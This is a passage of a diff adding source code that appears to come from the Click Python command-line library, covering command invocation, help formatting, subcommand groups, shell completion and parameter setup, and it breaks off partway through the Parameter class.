+ + if isinstance(ctx.command, MultiCommand) and ctx.command.chain: + results.extend( + CompletionItem(name, help=command.get_short_help_str()) + for name, command in _complete_visible_commands(ctx, incomplete) + if name not in ctx.protected_args + ) + + return results + + @t.overload + def main( + self, + args: t.Optional[t.Sequence[str]] = None, + prog_name: t.Optional[str] = None, + complete_var: t.Optional[str] = None, + standalone_mode: "te.Literal[True]" = True, + **extra: t.Any, + ) -> "te.NoReturn": + ... + + @t.overload + def main( + self, + args: t.Optional[t.Sequence[str]] = None, + prog_name: t.Optional[str] = None, + complete_var: t.Optional[str] = None, + standalone_mode: bool = ..., + **extra: t.Any, + ) -> t.Any: + ... + + def main( + self, + args: t.Optional[t.Sequence[str]] = None, + prog_name: t.Optional[str] = None, + complete_var: t.Optional[str] = None, + standalone_mode: bool = True, + windows_expand_args: bool = True, + **extra: t.Any, + ) -> t.Any: + """This is the way to invoke a script with all the bells and + whistles as a command line application. This will always terminate + the application after a call. If this is not wanted, ``SystemExit`` + needs to be caught. + + This method is also available by directly calling the instance of + a :class:`Command`. + + :param args: the arguments that should be used for parsing. If not + provided, ``sys.argv[1:]`` is used. + :param prog_name: the program name that should be used. By default + the program name is constructed by taking the file + name from ``sys.argv[0]``. + :param complete_var: the environment variable that controls the + bash completion support. The default is + ``"__COMPLETE"`` with prog_name in + uppercase. + :param standalone_mode: the default behavior is to invoke the script + in standalone mode. Click will then + handle exceptions and convert them into + error messages and the function will never + return but shut down the interpreter. If + this is set to `False` they will be + propagated to the caller and the return + value of this function is the return value + of :meth:`invoke`. + :param windows_expand_args: Expand glob patterns, user dir, and + env vars in command line args on Windows. + :param extra: extra keyword arguments are forwarded to the context + constructor. See :class:`Context` for more information. + + .. versionchanged:: 8.0.1 + Added the ``windows_expand_args`` parameter to allow + disabling command line arg expansion on Windows. + + .. versionchanged:: 8.0 + When taking arguments from ``sys.argv`` on Windows, glob + patterns, user dir, and env vars are expanded. + + .. versionchanged:: 3.0 + Added the ``standalone_mode`` parameter. + """ + if args is None: + args = sys.argv[1:] + + if os.name == "nt" and windows_expand_args: + args = _expand_args(args) + else: + args = list(args) + + if prog_name is None: + prog_name = _detect_program_name() + + # Process shell completion requests and exit early. + self._main_shell_completion(extra, prog_name, complete_var) + + try: + try: + with self.make_context(prog_name, args, **extra) as ctx: + rv = self.invoke(ctx) + if not standalone_mode: + return rv + # it's not safe to `ctx.exit(rv)` here! + # note that `rv` may actually contain data like "1" which + # has obvious effects + # more subtle case: `rv=[None, None]` can come out of + # chained commands which all returned `None` -- so it's not + # even always obvious that `rv` indicates success/failure + # by its truthiness/falsiness + ctx.exit() + except (EOFError, KeyboardInterrupt) as e: + echo(file=sys.stderr) + raise Abort() from e + except ClickException as e: + if not standalone_mode: + raise + e.show() + sys.exit(e.exit_code) + except OSError as e: + if e.errno == errno.EPIPE: + sys.stdout = t.cast(t.TextIO, PacifyFlushWrapper(sys.stdout)) + sys.stderr = t.cast(t.TextIO, PacifyFlushWrapper(sys.stderr)) + sys.exit(1) + else: + raise + except Exit as e: + if standalone_mode: + sys.exit(e.exit_code) + else: + # in non-standalone mode, return the exit code + # note that this is only reached if `self.invoke` above raises + # an Exit explicitly -- thus bypassing the check there which + # would return its result + # the results of non-standalone execution may therefore be + # somewhat ambiguous: if there are codepaths which lead to + # `ctx.exit(1)` and to `return 1`, the caller won't be able to + # tell the difference between the two + return e.exit_code + except Abort: + if not standalone_mode: + raise + echo(_("Aborted!"), file=sys.stderr) + sys.exit(1) + + def _main_shell_completion( + self, + ctx_args: t.MutableMapping[str, t.Any], + prog_name: str, + complete_var: t.Optional[str] = None, + ) -> None: + """Check if the shell is asking for tab completion, process + that, then exit early. Called from :meth:`main` before the + program is invoked. + + :param prog_name: Name of the executable in the shell. + :param complete_var: Name of the environment variable that holds + the completion instruction. Defaults to + ``_{PROG_NAME}_COMPLETE``. + + .. versionchanged:: 8.2.0 + Dots (``.``) in ``prog_name`` are replaced with underscores (``_``). + """ + if complete_var is None: + complete_name = prog_name.replace("-", "_").replace(".", "_") + complete_var = f"_{complete_name}_COMPLETE".upper() + + instruction = os.environ.get(complete_var) + + if not instruction: + return + + from .shell_completion import shell_complete + + rv = shell_complete(self, ctx_args, prog_name, complete_var, instruction) + sys.exit(rv) + + def __call__(self, *args: t.Any, **kwargs: t.Any) -> t.Any: + """Alias for :meth:`main`.""" + return self.main(*args, **kwargs) + + +class Command(BaseCommand): + """Commands are the basic building block of command line interfaces in + Click. A basic command handles command line parsing and might dispatch + more parsing to commands nested below it. + + :param name: the name of the command to use unless a group overrides it. + :param context_settings: an optional dictionary with defaults that are + passed to the context object. + :param callback: the callback to invoke. This is optional. + :param params: the parameters to register with this command. This can + be either :class:`Option` or :class:`Argument` objects. + :param help: the help string to use for this command. + :param epilog: like the help string but it's printed at the end of the + help page after everything else. + :param short_help: the short help to use for this command. This is + shown on the command listing of the parent command. + :param add_help_option: by default each command registers a ``--help`` + option. This can be disabled by this parameter. + :param no_args_is_help: this controls what happens if no arguments are + provided. This option is disabled by default. + If enabled this will add ``--help`` as argument + if no arguments are passed + :param hidden: hide this command from help outputs. + + :param deprecated: issues a message indicating that + the command is deprecated. + + .. versionchanged:: 8.1 + ``help``, ``epilog``, and ``short_help`` are stored unprocessed, + all formatting is done when outputting help text, not at init, + and is done even if not using the ``@command`` decorator. + + .. versionchanged:: 8.0 + Added a ``repr`` showing the command name. + + .. versionchanged:: 7.1 + Added the ``no_args_is_help`` parameter. + + .. versionchanged:: 2.0 + Added the ``context_settings`` parameter. + """ + + def __init__( + self, + name: t.Optional[str], + context_settings: t.Optional[t.MutableMapping[str, t.Any]] = None, + callback: t.Optional[t.Callable[..., t.Any]] = None, + params: t.Optional[t.List["Parameter"]] = None, + help: t.Optional[str] = None, + epilog: t.Optional[str] = None, + short_help: t.Optional[str] = None, + options_metavar: t.Optional[str] = "[OPTIONS]", + add_help_option: bool = True, + no_args_is_help: bool = False, + hidden: bool = False, + deprecated: bool = False, + ) -> None: + super().__init__(name, context_settings) + #: the callback to execute when the command fires. This might be + #: `None` in which case nothing happens. + self.callback = callback + #: the list of parameters for this command in the order they + #: should show up in the help page and execute. Eager parameters + #: will automatically be handled before non eager ones. + self.params: t.List["Parameter"] = params or [] + self.help = help + self.epilog = epilog + self.options_metavar = options_metavar + self.short_help = short_help + self.add_help_option = add_help_option + self.no_args_is_help = no_args_is_help + self.hidden = hidden + self.deprecated = deprecated + + def to_info_dict(self, ctx: Context) -> t.Dict[str, t.Any]: + info_dict = super().to_info_dict(ctx) + info_dict.update( + params=[param.to_info_dict() for param in self.get_params(ctx)], + help=self.help, + epilog=self.epilog, + short_help=self.short_help, + hidden=self.hidden, + deprecated=self.deprecated, + ) + return info_dict + + def get_usage(self, ctx: Context) -> str: + """Formats the usage line into a string and returns it. + + Calls :meth:`format_usage` internally. + """ + formatter = ctx.make_formatter() + self.format_usage(ctx, formatter) + return formatter.getvalue().rstrip("\n") + + def get_params(self, ctx: Context) -> t.List["Parameter"]: + rv = self.params + help_option = self.get_help_option(ctx) + + if help_option is not None: + rv = [*rv, help_option] + + return rv + + def format_usage(self, ctx: Context, formatter: HelpFormatter) -> None: + """Writes the usage line into the formatter. + + This is a low-level method called by :meth:`get_usage`. + """ + pieces = self.collect_usage_pieces(ctx) + formatter.write_usage(ctx.command_path, " ".join(pieces)) + + def collect_usage_pieces(self, ctx: Context) -> t.List[str]: + """Returns all the pieces that go into the usage line and returns + it as a list of strings. + """ + rv = [self.options_metavar] if self.options_metavar else [] + + for param in self.get_params(ctx): + rv.extend(param.get_usage_pieces(ctx)) + + return rv + + def get_help_option_names(self, ctx: Context) -> t.List[str]: + """Returns the names for the help option.""" + all_names = set(ctx.help_option_names) + for param in self.params: + all_names.difference_update(param.opts) + all_names.difference_update(param.secondary_opts) + return list(all_names) + + def get_help_option(self, ctx: Context) -> t.Optional["Option"]: + """Returns the help option object.""" + help_options = self.get_help_option_names(ctx) + + if not help_options or not self.add_help_option: + return None + + def show_help(ctx: Context, param: "Parameter", value: str) -> None: + if value and not ctx.resilient_parsing: + echo(ctx.get_help(), color=ctx.color) + ctx.exit() + + return Option( + help_options, + is_flag=True, + is_eager=True, + expose_value=False, + callback=show_help, + help=_("Show this message and exit."), + ) + + def make_parser(self, ctx: Context) -> OptionParser: + """Creates the underlying option parser for this command.""" + parser = OptionParser(ctx) + for param in self.get_params(ctx): + param.add_to_parser(parser, ctx) + return parser + + def get_help(self, ctx: Context) -> str: + """Formats the help into a string and returns it. + + Calls :meth:`format_help` internally. + """ + formatter = ctx.make_formatter() + self.format_help(ctx, formatter) + return formatter.getvalue().rstrip("\n") + + def get_short_help_str(self, limit: int = 45) -> str: + """Gets short help for the command or makes it by shortening the + long help string. + """ + if self.short_help: + text = inspect.cleandoc(self.short_help) + elif self.help: + text = make_default_short_help(self.help, limit) + else: + text = "" + + if self.deprecated: + text = _("(Deprecated) {text}").format(text=text) + + return text.strip() + + def format_help(self, ctx: Context, formatter: HelpFormatter) -> None: + """Writes the help into the formatter if it exists. + + This is a low-level method called by :meth:`get_help`. + + This calls the following methods: + + - :meth:`format_usage` + - :meth:`format_help_text` + - :meth:`format_options` + - :meth:`format_epilog` + """ + self.format_usage(ctx, formatter) + self.format_help_text(ctx, formatter) + self.format_options(ctx, formatter) + self.format_epilog(ctx, formatter) + + def format_help_text(self, ctx: Context, formatter: HelpFormatter) -> None: + """Writes the help text to the formatter if it exists.""" + if self.help is not None: + # truncate the help text to the first form feed + text = inspect.cleandoc(self.help).partition("\f")[0] + else: + text = "" + + if self.deprecated: + text = _("(Deprecated) {text}").format(text=text) + + if text: + formatter.write_paragraph() + + with formatter.indentation(): + formatter.write_text(text) + + def format_options(self, ctx: Context, formatter: HelpFormatter) -> None: + """Writes all the options into the formatter if they exist.""" + opts = [] + for param in self.get_params(ctx): + rv = param.get_help_record(ctx) + if rv is not None: + opts.append(rv) + + if opts: + with formatter.section(_("Options")): + formatter.write_dl(opts) + + def format_epilog(self, ctx: Context, formatter: HelpFormatter) -> None: + """Writes the epilog into the formatter if it exists.""" + if self.epilog: + epilog = inspect.cleandoc(self.epilog) + formatter.write_paragraph() + + with formatter.indentation(): + formatter.write_text(epilog) + + def parse_args(self, ctx: Context, args: t.List[str]) -> t.List[str]: + if not args and self.no_args_is_help and not ctx.resilient_parsing: + echo(ctx.get_help(), color=ctx.color) + ctx.exit() + + parser = self.make_parser(ctx) + opts, args, param_order = parser.parse_args(args=args) + + for param in iter_params_for_processing(param_order, self.get_params(ctx)): + value, args = param.handle_parse_result(ctx, opts, args) + + if args and not ctx.allow_extra_args and not ctx.resilient_parsing: + ctx.fail( + ngettext( + "Got unexpected extra argument ({args})", + "Got unexpected extra arguments ({args})", + len(args), + ).format(args=" ".join(map(str, args))) + ) + + ctx.args = args + ctx._opt_prefixes.update(parser._opt_prefixes) + return args + + def invoke(self, ctx: Context) -> t.Any: + """Given a context, this invokes the attached callback (if it exists) + in the right way. + """ + if self.deprecated: + message = _( + "DeprecationWarning: The command {name!r} is deprecated." + ).format(name=self.name) + echo(style(message, fg="red"), err=True) + + if self.callback is not None: + return ctx.invoke(self.callback, **ctx.params) + + def shell_complete(self, ctx: Context, incomplete: str) -> t.List["CompletionItem"]: + """Return a list of completions for the incomplete value. Looks + at the names of options and chained multi-commands. + + :param ctx: Invocation context for this command. + :param incomplete: Value being completed. May be empty. + + .. versionadded:: 8.0 + """ + from click.shell_completion import CompletionItem + + results: t.List["CompletionItem"] = [] + + if incomplete and not incomplete[0].isalnum(): + for param in self.get_params(ctx): + if ( + not isinstance(param, Option) + or param.hidden + or ( + not param.multiple + and ctx.get_parameter_source(param.name) # type: ignore + is ParameterSource.COMMANDLINE + ) + ): + continue + + results.extend( + CompletionItem(name, help=param.help) + for name in [*param.opts, *param.secondary_opts] + if name.startswith(incomplete) + ) + + results.extend(super().shell_complete(ctx, incomplete)) + return results + + +class MultiCommand(Command): + """A multi command is the basic implementation of a command that + dispatches to subcommands. The most common version is the + :class:`Group`. + + :param invoke_without_command: this controls how the multi command itself + is invoked. By default it's only invoked + if a subcommand is provided. + :param no_args_is_help: this controls what happens if no arguments are + provided. This option is enabled by default if + `invoke_without_command` is disabled or disabled + if it's enabled. If enabled this will add + ``--help`` as argument if no arguments are + passed. + :param subcommand_metavar: the string that is used in the documentation + to indicate the subcommand place. + :param chain: if this is set to `True` chaining of multiple subcommands + is enabled. This restricts the form of commands in that + they cannot have optional arguments but it allows + multiple commands to be chained together. + :param result_callback: The result callback to attach to this multi + command. This can be set or changed later with the + :meth:`result_callback` decorator. + :param attrs: Other command arguments described in :class:`Command`. + """ + + allow_extra_args = True + allow_interspersed_args = False + + def __init__( + self, + name: t.Optional[str] = None, + invoke_without_command: bool = False, + no_args_is_help: t.Optional[bool] = None, + subcommand_metavar: t.Optional[str] = None, + chain: bool = False, + result_callback: t.Optional[t.Callable[..., t.Any]] = None, + **attrs: t.Any, + ) -> None: + super().__init__(name, **attrs) + + if no_args_is_help is None: + no_args_is_help = not invoke_without_command + + self.no_args_is_help = no_args_is_help + self.invoke_without_command = invoke_without_command + + if subcommand_metavar is None: + if chain: + subcommand_metavar = "COMMAND1 [ARGS]... [COMMAND2 [ARGS]...]..." + else: + subcommand_metavar = "COMMAND [ARGS]..." + + self.subcommand_metavar = subcommand_metavar + self.chain = chain + # The result callback that is stored. This can be set or + # overridden with the :func:`result_callback` decorator. + self._result_callback = result_callback + + if self.chain: + for param in self.params: + if isinstance(param, Argument) and not param.required: + raise RuntimeError( + "Multi commands in chain mode cannot have" + " optional arguments." + ) + + def to_info_dict(self, ctx: Context) -> t.Dict[str, t.Any]: + info_dict = super().to_info_dict(ctx) + commands = {} + + for name in self.list_commands(ctx): + command = self.get_command(ctx, name) + + if command is None: + continue + + sub_ctx = ctx._make_sub_context(command) + + with sub_ctx.scope(cleanup=False): + commands[name] = command.to_info_dict(sub_ctx) + + info_dict.update(commands=commands, chain=self.chain) + return info_dict + + def collect_usage_pieces(self, ctx: Context) -> t.List[str]: + rv = super().collect_usage_pieces(ctx) + rv.append(self.subcommand_metavar) + return rv + + def format_options(self, ctx: Context, formatter: HelpFormatter) -> None: + super().format_options(ctx, formatter) + self.format_commands(ctx, formatter) + + def result_callback(self, replace: bool = False) -> t.Callable[[F], F]: + """Adds a result callback to the command. By default if a + result callback is already registered this will chain them but + this can be disabled with the `replace` parameter. The result + callback is invoked with the return value of the subcommand + (or the list of return values from all subcommands if chaining + is enabled) as well as the parameters as they would be passed + to the main callback. + + Example:: + + @click.group() + @click.option('-i', '--input', default=23) + def cli(input): + return 42 + + @cli.result_callback() + def process_result(result, input): + return result + input + + :param replace: if set to `True` an already existing result + callback will be removed. + + .. versionchanged:: 8.0 + Renamed from ``resultcallback``. + + .. versionadded:: 3.0 + """ + + def decorator(f: F) -> F: + old_callback = self._result_callback + + if old_callback is None or replace: + self._result_callback = f + return f + + def function(__value, *args, **kwargs): # type: ignore + inner = old_callback(__value, *args, **kwargs) + return f(inner, *args, **kwargs) + + self._result_callback = rv = update_wrapper(t.cast(F, function), f) + return rv + + return decorator + + def format_commands(self, ctx: Context, formatter: HelpFormatter) -> None: + """Extra format methods for multi methods that adds all the commands + after the options. + """ + commands = [] + for subcommand in self.list_commands(ctx): + cmd = self.get_command(ctx, subcommand) + # What is this, the tool lied about a command. Ignore it + if cmd is None: + continue + if cmd.hidden: + continue + + commands.append((subcommand, cmd)) + + # allow for 3 times the default spacing + if len(commands): + limit = formatter.width - 6 - max(len(cmd[0]) for cmd in commands) + + rows = [] + for subcommand, cmd in commands: + help = cmd.get_short_help_str(limit) + rows.append((subcommand, help)) + + if rows: + with formatter.section(_("Commands")): + formatter.write_dl(rows) + + def parse_args(self, ctx: Context, args: t.List[str]) -> t.List[str]: + if not args and self.no_args_is_help and not ctx.resilient_parsing: + echo(ctx.get_help(), color=ctx.color) + ctx.exit() + + rest = super().parse_args(ctx, args) + + if self.chain: + ctx.protected_args = rest + ctx.args = [] + elif rest: + ctx.protected_args, ctx.args = rest[:1], rest[1:] + + return ctx.args + + def invoke(self, ctx: Context) -> t.Any: + def _process_result(value: t.Any) -> t.Any: + if self._result_callback is not None: + value = ctx.invoke(self._result_callback, value, **ctx.params) + return value + + if not ctx.protected_args: + if self.invoke_without_command: + # No subcommand was invoked, so the result callback is + # invoked with the group return value for regular + # groups, or an empty list for chained groups. + with ctx: + rv = super().invoke(ctx) + return _process_result([] if self.chain else rv) + ctx.fail(_("Missing command.")) + + # Fetch args back out + args = [*ctx.protected_args, *ctx.args] + ctx.args = [] + ctx.protected_args = [] + + # If we're not in chain mode, we only allow the invocation of a + # single command but we also inform the current context about the + # name of the command to invoke. + if not self.chain: + # Make sure the context is entered so we do not clean up + # resources until the result processor has worked. + with ctx: + cmd_name, cmd, args = self.resolve_command(ctx, args) + assert cmd is not None + ctx.invoked_subcommand = cmd_name + super().invoke(ctx) + sub_ctx = cmd.make_context(cmd_name, args, parent=ctx) + with sub_ctx: + return _process_result(sub_ctx.command.invoke(sub_ctx)) + + # In chain mode we create the contexts step by step, but after the + # base command has been invoked. Because at that point we do not + # know the subcommands yet, the invoked subcommand attribute is + # set to ``*`` to inform the command that subcommands are executed + # but nothing else. + with ctx: + ctx.invoked_subcommand = "*" if args else None + super().invoke(ctx) + + # Otherwise we make every single context and invoke them in a + # chain. In that case the return value to the result processor + # is the list of all invoked subcommand's results. + contexts = [] + while args: + cmd_name, cmd, args = self.resolve_command(ctx, args) + assert cmd is not None + sub_ctx = cmd.make_context( + cmd_name, + args, + parent=ctx, + allow_extra_args=True, + allow_interspersed_args=False, + ) + contexts.append(sub_ctx) + args, sub_ctx.args = sub_ctx.args, [] + + rv = [] + for sub_ctx in contexts: + with sub_ctx: + rv.append(sub_ctx.command.invoke(sub_ctx)) + return _process_result(rv) + + def resolve_command( + self, ctx: Context, args: t.List[str] + ) -> t.Tuple[t.Optional[str], t.Optional[Command], t.List[str]]: + cmd_name = make_str(args[0]) + original_cmd_name = cmd_name + + # Get the command + cmd = self.get_command(ctx, cmd_name) + + # If we can't find the command but there is a normalization + # function available, we try with that one. + if cmd is None and ctx.token_normalize_func is not None: + cmd_name = ctx.token_normalize_func(cmd_name) + cmd = self.get_command(ctx, cmd_name) + + # If we don't find the command we want to show an error message + # to the user that it was not provided. However, there is + # something else we should do: if the first argument looks like + # an option we want to kick off parsing again for arguments to + # resolve things like --help which now should go to the main + # place. + if cmd is None and not ctx.resilient_parsing: + if split_opt(cmd_name)[0]: + self.parse_args(ctx, ctx.args) + ctx.fail(_("No such command {name!r}.").format(name=original_cmd_name)) + return cmd_name if cmd else None, cmd, args[1:] + + def get_command(self, ctx: Context, cmd_name: str) -> t.Optional[Command]: + """Given a context and a command name, this returns a + :class:`Command` object if it exists or returns `None`. + """ + raise NotImplementedError + + def list_commands(self, ctx: Context) -> t.List[str]: + """Returns a list of subcommand names in the order they should + appear. + """ + return [] + + def shell_complete(self, ctx: Context, incomplete: str) -> t.List["CompletionItem"]: + """Return a list of completions for the incomplete value. Looks + at the names of options, subcommands, and chained + multi-commands. + + :param ctx: Invocation context for this command. + :param incomplete: Value being completed. May be empty. + + .. versionadded:: 8.0 + """ + from click.shell_completion import CompletionItem + + results = [ + CompletionItem(name, help=command.get_short_help_str()) + for name, command in _complete_visible_commands(ctx, incomplete) + ] + results.extend(super().shell_complete(ctx, incomplete)) + return results + + +class Group(MultiCommand): + """A group allows a command to have subcommands attached. This is + the most common way to implement nesting in Click. + + :param name: The name of the group command. + :param commands: A dict mapping names to :class:`Command` objects. + Can also be a list of :class:`Command`, which will use + :attr:`Command.name` to create the dict. + :param attrs: Other command arguments described in + :class:`MultiCommand`, :class:`Command`, and + :class:`BaseCommand`. + + .. versionchanged:: 8.0 + The ``commands`` argument can be a list of command objects. + """ + + #: If set, this is used by the group's :meth:`command` decorator + #: as the default :class:`Command` class. This is useful to make all + #: subcommands use a custom command class. + #: + #: .. versionadded:: 8.0 + command_class: t.Optional[t.Type[Command]] = None + + #: If set, this is used by the group's :meth:`group` decorator + #: as the default :class:`Group` class. This is useful to make all + #: subgroups use a custom group class. + #: + #: If set to the special value :class:`type` (literally + #: ``group_class = type``), this group's class will be used as the + #: default class. This makes a custom group class continue to make + #: custom groups. + #: + #: .. versionadded:: 8.0 + group_class: t.Optional[t.Union[t.Type["Group"], t.Type[type]]] = None + # Literal[type] isn't valid, so use Type[type] + + def __init__( + self, + name: t.Optional[str] = None, + commands: t.Optional[ + t.Union[t.MutableMapping[str, Command], t.Sequence[Command]] + ] = None, + **attrs: t.Any, + ) -> None: + super().__init__(name, **attrs) + + if commands is None: + commands = {} + elif isinstance(commands, abc.Sequence): + commands = {c.name: c for c in commands if c.name is not None} + + #: The registered subcommands by their exported names. + self.commands: t.MutableMapping[str, Command] = commands + + def add_command(self, cmd: Command, name: t.Optional[str] = None) -> None: + """Registers another :class:`Command` with this group. If the name + is not provided, the name of the command is used. + """ + name = name or cmd.name + if name is None: + raise TypeError("Command has no name.") + _check_multicommand(self, name, cmd, register=True) + self.commands[name] = cmd + + @t.overload + def command(self, __func: t.Callable[..., t.Any]) -> Command: + ... + + @t.overload + def command( + self, *args: t.Any, **kwargs: t.Any + ) -> t.Callable[[t.Callable[..., t.Any]], Command]: + ... + + def command( + self, *args: t.Any, **kwargs: t.Any + ) -> t.Union[t.Callable[[t.Callable[..., t.Any]], Command], Command]: + """A shortcut decorator for declaring and attaching a command to + the group. This takes the same arguments as :func:`command` and + immediately registers the created command with this group by + calling :meth:`add_command`. + + To customize the command class used, set the + :attr:`command_class` attribute. + + .. versionchanged:: 8.1 + This decorator can be applied without parentheses. + + .. versionchanged:: 8.0 + Added the :attr:`command_class` attribute. + """ + from .decorators import command + + func: t.Optional[t.Callable[..., t.Any]] = None + + if args and callable(args[0]): + assert ( + len(args) == 1 and not kwargs + ), "Use 'command(**kwargs)(callable)' to provide arguments." + (func,) = args + args = () + + if self.command_class and kwargs.get("cls") is None: + kwargs["cls"] = self.command_class + + def decorator(f: t.Callable[..., t.Any]) -> Command: + cmd: Command = command(*args, **kwargs)(f) + self.add_command(cmd) + return cmd + + if func is not None: + return decorator(func) + + return decorator + + @t.overload + def group(self, __func: t.Callable[..., t.Any]) -> "Group": + ... + + @t.overload + def group( + self, *args: t.Any, **kwargs: t.Any + ) -> t.Callable[[t.Callable[..., t.Any]], "Group"]: + ... + + def group( + self, *args: t.Any, **kwargs: t.Any + ) -> t.Union[t.Callable[[t.Callable[..., t.Any]], "Group"], "Group"]: + """A shortcut decorator for declaring and attaching a group to + the group. This takes the same arguments as :func:`group` and + immediately registers the created group with this group by + calling :meth:`add_command`. + + To customize the group class used, set the :attr:`group_class` + attribute. + + .. versionchanged:: 8.1 + This decorator can be applied without parentheses. + + .. versionchanged:: 8.0 + Added the :attr:`group_class` attribute. + """ + from .decorators import group + + func: t.Optional[t.Callable[..., t.Any]] = None + + if args and callable(args[0]): + assert ( + len(args) == 1 and not kwargs + ), "Use 'group(**kwargs)(callable)' to provide arguments." + (func,) = args + args = () + + if self.group_class is not None and kwargs.get("cls") is None: + if self.group_class is type: + kwargs["cls"] = type(self) + else: + kwargs["cls"] = self.group_class + + def decorator(f: t.Callable[..., t.Any]) -> "Group": + cmd: Group = group(*args, **kwargs)(f) + self.add_command(cmd) + return cmd + + if func is not None: + return decorator(func) + + return decorator + + def get_command(self, ctx: Context, cmd_name: str) -> t.Optional[Command]: + return self.commands.get(cmd_name) + + def list_commands(self, ctx: Context) -> t.List[str]: + return sorted(self.commands) + + +class CommandCollection(MultiCommand): + """A command collection is a multi command that merges multiple multi + commands together into one. This is a straightforward implementation + that accepts a list of different multi commands as sources and + provides all the commands for each of them. + + See :class:`MultiCommand` and :class:`Command` for the description of + ``name`` and ``attrs``. + """ + + def __init__( + self, + name: t.Optional[str] = None, + sources: t.Optional[t.List[MultiCommand]] = None, + **attrs: t.Any, + ) -> None: + super().__init__(name, **attrs) + #: The list of registered multi commands. + self.sources: t.List[MultiCommand] = sources or [] + + def add_source(self, multi_cmd: MultiCommand) -> None: + """Adds a new multi command to the chain dispatcher.""" + self.sources.append(multi_cmd) + + def get_command(self, ctx: Context, cmd_name: str) -> t.Optional[Command]: + for source in self.sources: + rv = source.get_command(ctx, cmd_name) + + if rv is not None: + if self.chain: + _check_multicommand(self, cmd_name, rv) + + return rv + + return None + + def list_commands(self, ctx: Context) -> t.List[str]: + rv: t.Set[str] = set() + + for source in self.sources: + rv.update(source.list_commands(ctx)) + + return sorted(rv) + + +def _check_iter(value: t.Any) -> t.Iterator[t.Any]: + """Check if the value is iterable but not a string. Raises a type + error, or return an iterator over the value. + """ + if isinstance(value, str): + raise TypeError + + return iter(value) + + +class Parameter: + r"""A parameter to a command comes in two versions: they are either + :class:`Option`\s or :class:`Argument`\s. Other subclasses are currently + not supported by design as some of the internals for parsing are + intentionally not finalized. + + Some settings are supported by both options and arguments. + + :param param_decls: the parameter declarations for this option or + argument. This is a list of flags or argument + names. + :param type: the type that should be used. Either a :class:`ParamType` + or a Python type. The latter is converted into the former + automatically if supported. + :param required: controls if this is optional or not. + :param default: the default value if omitted. This can also be a callable, + in which case it's invoked when the default is needed + without any arguments. + :param callback: A function to further process or validate the value + after type conversion. It is called as ``f(ctx, param, value)`` + and must return the value. It is called for all sources, + including prompts. + :param nargs: the number of arguments to match. If not ``1`` the return + value is a tuple instead of single value. The default for + nargs is ``1`` (except if the type is a tuple, then it's + the arity of the tuple). If ``nargs=-1``, all remaining + parameters are collected. + :param metavar: how the value is represented in the help page. + :param expose_value: if this is `True` then the value is passed onwards + to the command callback and stored on the context, + otherwise it's skipped. + :param is_eager: eager values are processed before non eager ones. This + should not be set for arguments or it will inverse the + order of processing. + :param envvar: a string or list of strings that are environment variables + that should be checked. + :param shell_complete: A function that returns custom shell + completions. Used instead of the param's type completion if + given. Takes ``ctx, param, incomplete`` and must return a list + of :class:`~click.shell_completion.CompletionItem` or a list of + strings. + + .. versionchanged:: 8.0 + ``process_value`` validates required parameters and bounded + ``nargs``, and invokes the parameter callback before returning + the value. This allows the callback to validate prompts. + ``full_process_value`` is removed. + + .. versionchanged:: 8.0 + ``autocompletion`` is renamed to ``shell_complete`` and has new + semantics described above. The old name is deprecated and will + be removed in 8.1, until then it will be wrapped to match the + new requirements. + + .. versionchanged:: 8.0 + For ``multiple=True, nargs>1``, the default must be a list of + tuples. + + .. versionchanged:: 8.0 + Setting a default is no longer required for ``nargs>1``, it will + default to ``None``. ``multiple=True`` or ``nargs=-1`` will + default to ``()``. + + .. versionchanged:: 7.1 + Empty environment variables are ignored rather than taking the + empty string value. This makes it possible for scripts to clear + variables if they can't unset them. + + .. versionchanged:: 2.0 + Changed signature for parameter callback to also be passed the + parameter. The old callback format will still work, but it will + raise a warning to give you a chance to migrate the code easier. + """ + + param_type_name = "parameter" + + def __init__( + self, + param_decls: t.Optional[t.Sequence[str]] = None, + type: t.Optional[t.Union[types.ParamType, t.Any]] = None, + required: bool = False, + default: t.Optional[t.Union[t.Any, t.Callable[[], t.Any]]] = None, + callback: t.Optional[t.Callable[[Context, "Parameter", t.Any], t.Any]] = None, + nargs: t.Optional[int] = None, + multiple: bool = False, + metavar: t.Optional[str] = None, + expose_value: bool = True, + is_eager: bool = False, + envvar: t.Optional[t.Union[str, t.Sequence[str]]] = None, + shell_complete: t.Optional[ + t.Callable[ + [Context, "Parameter", str], + t.Union[t.List["CompletionItem"], t.List[str]], + ] + ] = None, + ) -> None: + self.name: t.Optional[str] + self.opts: t.List[str] + self.secondary_opts: t.List[str] + self.name, self.opts, self.secondary_opts = self._parse_decls( + param_decls or (), expose_value + ) + self.type: types.ParamType = types.convert_type(type, default) + + # Default nargs to what the type tells us if we have that + # information available. + if nargs is None: + if self.type.is_composite: + nargs = self.type.arity + else: + nargs = 1 + + self.required = required + self.callback = callback + self.nargs = nargs + self.multiple = multiple + self.expose_value = expose_value + self.default = default + self.is_eager = is_eager + self.metavar = metavar + self.envvar = envvar + self._custom_shell_complete = shell_complete + + if __debug__: + if self.type.is_composite and nargs != self.type.arity: + raise ValueError( + f"'nargs' must be {self.type.arity} (or None) for" + f" type {self.type!r}, but it was {nargs}." + ) + + # Skip no default or callable default. + check_default = default if not callable(default) else None + + if check_default is not None: + if multiple: + try: + # Only check the first value against nargs. + check_default = next(_check_iter(check_default), None) + except TypeError: + raise ValueError( + "'default' must be a list when 'multiple' is true." + ) from None + + # Can be None for multiple with empty default. + if nargs != 1 and check_default is not None: + try: + _check_iter(check_default) + except TypeError: + if multiple: + message = ( + "'default' must be a list of lists when 'multiple' is" + " true and 'nargs' != 1." + ) + else: + message = "'default' must be a list when 'nargs' != 1." + + raise ValueError(message) from None + + if nargs > 1 and len(check_default) != nargs: + subject = "item length" if multiple else "length" + raise ValueError( + f"'default' {subject} must match nargs={nargs}." + ) + + def to_info_dict(self) -> t.Dict[str, t.Any]: + """Gather information that could be useful for a tool generating + user-facing documentation. + + Use :meth:`click.Context.to_info_dict` to traverse the entire + CLI structure. + + .. versionadded:: 8.0 + """ + return { + "name": self.name, + "param_type_name": self.param_type_name, + "opts": self.opts, + "secondary_opts": self.secondary_opts, + "type": self.type.to_info_dict(), + "required": self.required, + "nargs": self.nargs, + "multiple": self.multiple, + "default": self.default, + "envvar": self.envvar, + } + + def __repr__(self) -> str: + return f"<{self.__class__.__name__} {self.name}>" + + def _parse_decls( + self, decls: t.Sequence[str], expose_value: bool + ) -> t.Tuple[t.Optional[str], t.List[str], t.List[str]]: + raise NotImplementedError() + + @property + def human_readable_name(self) -> str: + """Returns the human readable name of this parameter. This is the + same as the name for options, but the metavar for arguments. + """ + return self.name # type: ignore + + def make_metavar(self) -> str: 